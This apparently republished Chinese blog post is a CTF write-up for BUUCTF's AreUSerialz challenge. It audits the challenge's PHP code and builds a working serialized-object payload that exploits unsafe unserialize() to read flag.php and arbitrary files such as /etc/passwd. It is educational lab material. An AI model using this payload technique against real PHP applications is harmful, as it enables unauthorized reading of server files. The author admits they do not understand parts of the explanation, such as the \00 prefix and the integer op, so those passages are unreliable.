devbox
花生_TL007
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

【web | CTF】BUUCTF [网鼎杯 2020 青龙组]AreUSerialz

作者:花生_TL007 | 2024-02-18 19:36:13

【web | CTF】BUUCTF [网鼎杯 2020 青龙组]AreUSerialz

天命:php的序列化题目简直是玄学,既不能本地复现,也不能求证靶场环境

天命:本地php是复现不了反序列化漏洞的,都不知道是版本问题还是其他问题

天命:这题也是有点奇怪的,明明用字符串2也应该是可以,但偏偏就不行,神奇了

进来题目先看到php代码审计,是反序列化漏洞

先看进来入口的逻辑,判断是不是正常的ascii码字符,然后反序列化,可以忽略校验,都是正常的

  1. // 校验你是不是ascii码里面的合法字符
  2. function is_valid($s) {
  3.     for($i = 0; $i < strlen($s); $i++)
  4.         if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
  5.             return false;
  6.     return true;
  7. }
  8.  
  9. // 接受变量然后校验,进行反序列化激活类
  10. if(isset($_GET{'str'})) {
  11.  
  12.     $str = (string)$_GET['str'];
  13.     if(is_valid($str)) {
  14.         $obj = unserialize($str); // 反序列化
  15.     }
  16.  
  17. }

接下来看一下生命周期函数和四大函数

看了一下只有读文件函数是有用的,那就要 $op=2 或者$op='2' 才行

  1.     // 生命周期函数:初始化函数
  2.     function __construct() {
  3.         $op = "1";
  4.         $filename = "/tmp/tmpfile";
  5.         $content = "Hello World!";
  6.         $this->process();
  7.     }
  8.  
  9.     // 关键函数,当op等于2时候才进去正确的函数,读文件
  10.     public function process() {
  11.         if($this->op == "1") {
  12.             $this->write();
  13.         } else if($this->op == "2") {
  14.             $res = $this->read();
  15.             $this->output($res);
  16.         } else {
  17.             $this->output("Bad Hacker!");
  18.         }
  19.     }
  20.  
  21.     // 这个函数是废的,我们要读取文件找flag,不是来写东西进文件
  22.     private function write() {
  23.  
  24.     }
  25.  
  26.     // 文件包含漏洞的函数,能读取所有的文件,包括/etc/passwd都能读取
  27.     private function read() {
  28.         $res = "";
  29.         if(isset($this->filename)) {
  30.             $res = file_get_contents($this->filename);
  31.         }
  32.         return $res;
  33.     }
  34.     // 打印出来
  35.     private function output($s) {
  36.         echo "[Result]: <br>";
  37.         echo $s;
  38.     }

$op 等于整数 2 即可,$filename等于 flag.php 即可,不需要 fuzz 

比赛的现场题目是需要fuzz或者寻找一些配置文件来探索flag文件在哪里的

反正权限贼高,能读到 /etc/passwd

  1. class FileHandler {
  2.  
  3.     public $op = 2;
  4.     public $filename = "flag.php";
  5.     public $content = "aaa";
  6.  
  7.  
  8. }
  9.  
  10. $obj = new FileHandler();
  11. echo serialize($obj);
  12.  
  13. // 最后生成如下
  14. O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:3:"aaa";}

需要改动一下

改动1:把小写s改成大写S

改动2:在op前面增加\00*\00,因为私有属性是会自带 * 号,需要用\00来截断(原理不清楚)

奇怪的地方:$op是整数2,不能是字符串的2,很奇怪,明明字符串的2也可以啊

改好后最终答案如下

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:3:"aaa";}

flag{5f3275d0-e4ee-4faa-b72c-8c129a7c3400}

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/花生_TL007/article/detail/110084
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号